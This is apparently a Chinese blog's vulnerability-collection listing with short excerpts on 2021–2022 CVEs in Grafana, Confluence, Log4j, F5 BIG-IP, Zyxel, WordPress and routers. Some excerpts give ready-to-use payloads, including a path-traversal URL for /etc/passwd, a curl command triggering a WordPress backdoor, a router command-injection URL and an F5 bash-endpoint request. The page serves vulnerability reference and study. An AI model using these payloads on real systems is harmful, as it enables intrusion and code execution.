![](https://img-blog.csdnimg.cn/fca4cc9f82b9406883e2d5896d5f09f9.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
漏洞库
时不时收集点漏洞
三鲜水饺子
脚本小子模式
展开
-
(CVE-2022-30075) Tp-Link Archer AX50 Authenticated RCE
在Tp-Link路由器中进行身份验证的远程代码执行如果您的Tp-Link路由器具有备份和恢复功能,并且固件早于2022年6月,它可能很脆弱Tp-Link Archer AX50,其他tplink路由器可能会使用不同格式的备份,漏洞需要修改......原创 2022-06-13 10:09:17 · 1232 阅读 · 1 评论 -
CVE-2022-32275 Grafana 8.4.3
转到登录页面并在登录参数上输入payload : /dashboard/snapshot/*?orgId=0%20/invite/:原创 2022-06-07 23:20:26 · 547 阅读 · 0 评论 -
CVE-2022-32275 Grafana 8.4.3
CVE-2022-32275 Grafana 8.4.3 允许通过a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd 来读取文件原创 2022-06-07 23:11:08 · 688 阅读 · 0 评论 -
CVE-2022-24288 Apache Airflow RCE POC/EXP
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。这可以通过确保设置为来缓解。(payload1 2是俩个不同利用点,选择用一个就行)...原创 2022-06-06 19:15:05 · 1072 阅读 · 0 评论 -
Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现
远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2对S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/原创 2022-06-06 19:12:08 · 1418 阅读 · 0 评论 -
CVE-2022-29383 NETGEAR ProSafe SSL SQL注入漏洞
Firmware version: FVS336Gv2 - FVS336Gv3原创 2022-06-05 23:43:58 · 641 阅读 · 1 评论 -
CVE-2022-24990信息泄露 RCE漏洞
Terramaster TOS是中国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本中的webNasIPS 组件中的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令。 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE原创 2022-06-05 17:47:21 · 2199 阅读 · 0 评论 -
Atlassian Confluence 远程代码执行/CVE-2022-26134
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自...原创 2022-06-05 00:41:01 · 995 阅读 · 0 评论 -
CVE-2022-1609 WordPress Weblizar Backdoor
$curl-s-d'blowfish=1'-d"blowf=system('id');"'http://localhost:8888/wp-json/am-member/license'uid=33(www-data)gid=33(www-data)groups=33(www-data)原创 2022-05-30 13:07:18 · 613 阅读 · 0 评论 -
CVE-2021-46422 SDT-CW3B1 1.1.0 - OS Command Injection
poc:hxxp://x.x.x.x/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id原创 2022-05-25 14:16:45 · 468 阅读 · 0 评论 -
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容import org.apache.logging.log4j.LogManager;import org.apache.logging.log4j.Logger;public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);原创 2021-12-10 17:01:41 · 5294 阅读 · 0 评论 -
CVE-2022-1388-EXP(F5-BIGIP)
简介F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。EXPPOST /mgmt/tm/util/bash HTTP/1.1Host: X-F5-Auth-Token: aAuthorization: Basic YWRtaW46Connection: keep-alive, x-F5-Auth-TokenContent-Length: 0Cache-Control: max-age=0{原创 2022-05-14 23:56:34 · 1002 阅读 · 0 评论 -
(CVE-2022-30525)Zyxel 防火墙未经身份验证的远程命令注入
前言该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。影响版本影响组件 固件版本USG FLEX 100, 100W, 200, 500, 700原创 2022-05-14 23:51:13 · 1634 阅读 · 0 评论